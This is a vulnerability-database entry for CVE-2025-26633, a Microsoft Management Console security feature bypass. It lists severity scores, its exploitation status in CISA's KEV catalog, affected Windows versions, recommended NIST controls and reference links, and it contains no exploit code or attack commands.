CVE-2025-26633

HighCISA KEVActive ExploitationPublic PoCRansomware-linked

Published: 11 March 2025

Published

11 March 2025

Modified

27 October 2025

KEV Added

11 March 2025

Patch

—

CVSS Score 7.0 CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS Score 0.4252 97.5th percentile

Risk Priority 60 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-26633 is a high-severity Improper Neutralization (CWE-707) vulnerability in Microsoft Windows 10 21H2. Its CVSS base score is 7.0 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique MMC (T1218.014); ranked in the top 2.5% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).

Threat & Defense at a Glance

What attackers do: exploitation maps to MMC (T1218.014). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Directly remediates the improper neutralization flaw in Microsoft Management Console by applying timely vendor patches from Microsoft's update guide.

SI-10 Information Input Validation good match

prevent

Addresses the root cause of CWE-707 improper neutralization by validating inputs to MMC, preventing security feature bypass exploits.

RA-5 Vulnerability Monitoring and Scanning good match

detect

Scans and monitors for known vulnerabilities like CVE-2025-26633 in MMC, enabling identification and prioritization for remediation given its presence in CISA KEV catalog.

MITRE ATT&CK Enterprise TechniquesAI

T1218.014 MMC Stealth

Adversaries may abuse mmc.

attack.mitre.org →

Why these techniques?

The vulnerability is a local security feature bypass in MMC, directly enabling adversaries to use MMC for proxy execution of malicious payloads or snap-ins while evading intended controls.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally.

Deeper analysisAI

CVE-2025-26633 is an improper neutralization vulnerability in the Microsoft Management Console (MMC) that enables an unauthorized attacker to bypass a security feature locally. Published on 2025-03-11, the issue is associated with CWE-707 and carries a CVSS v3.1 base score of 7.0 (AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H), indicating high potential impact despite requiring local access and user interaction.

An unauthorized attacker with local access to the system can exploit this vulnerability, which demands high attack complexity and user interaction but no special privileges. Successful exploitation allows the attacker to achieve high impacts on confidentiality, integrity, and availability, effectively bypassing MMC security controls.

Microsoft's Security Response Center provides an update guide for remediation at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633. Vicarius offers a detection script at https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script and a mitigation script at https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script.

The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog at https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-26633, indicating real-world exploitation.

Details

CWE(s): CWE-707 NVD-CWE-noinfo
KEV Date Added: 11 March 2025

Affected Products

microsoft

windows 10 1507

≤ 10.0.10240.20947 · ≤ 10.0.10240.20947

microsoft

windows 10 1607

≤ 10.0.14393.7876 · ≤ 10.0.14393.7876

microsoft

windows 10 1809

≤ 10.0.17763.7009 · ≤ 10.0.17763.7009

microsoft

windows 10 21h2

≤ 10.0.19044.5608 · ≤ 10.0.19044.5608 · ≤ 10.0.19044.5608

microsoft

windows 10 22h2

≤ 10.0.19045.5608 · ≤ 10.0.19045.5608 · ≤ 10.0.19045.5608

microsoft

windows 11 22h2

≤ 10.0.22621.5039 · ≤ 10.0.22621.5039

microsoft

windows 11 23h2

≤ 10.0.22631.5039 · ≤ 10.0.22631.5039

microsoft

windows 11 24h2

≤ 10.0.26100.3403 · ≤ 10.0.26100.3403

microsoft

windows server 2008

all versions, r2

microsoft

windows server 2012

all versions, r2

+5 more product configuration(s) — see NVD for full list

CVEs Like This One

CVE-2025-24985Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-24993Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-24991Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-24054Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-59230Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-24990Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-24984Same product: Microsoft Windows 10 1507both on KEV

CVE-2025-21418Same product: Microsoft Windows 10 1607both on KEV

CVE-2025-21391Same product: Microsoft Windows 10 1507both on KEV

CVE-2026-21510Same product: Microsoft Windows 10 1607both on KEV

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
Vendor Advisory · secure@microsoft.com
https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script
Exploit, Third Party Advisory · af854a3a-2127-422b-91ae-364da2661108
https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Exploit, Third Party Advisory · af854a3a-2127-422b-91ae-364da2661108
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-26633
US Government Resource · 134c704f-9b21-4f2e-91b3-4a467353bcc0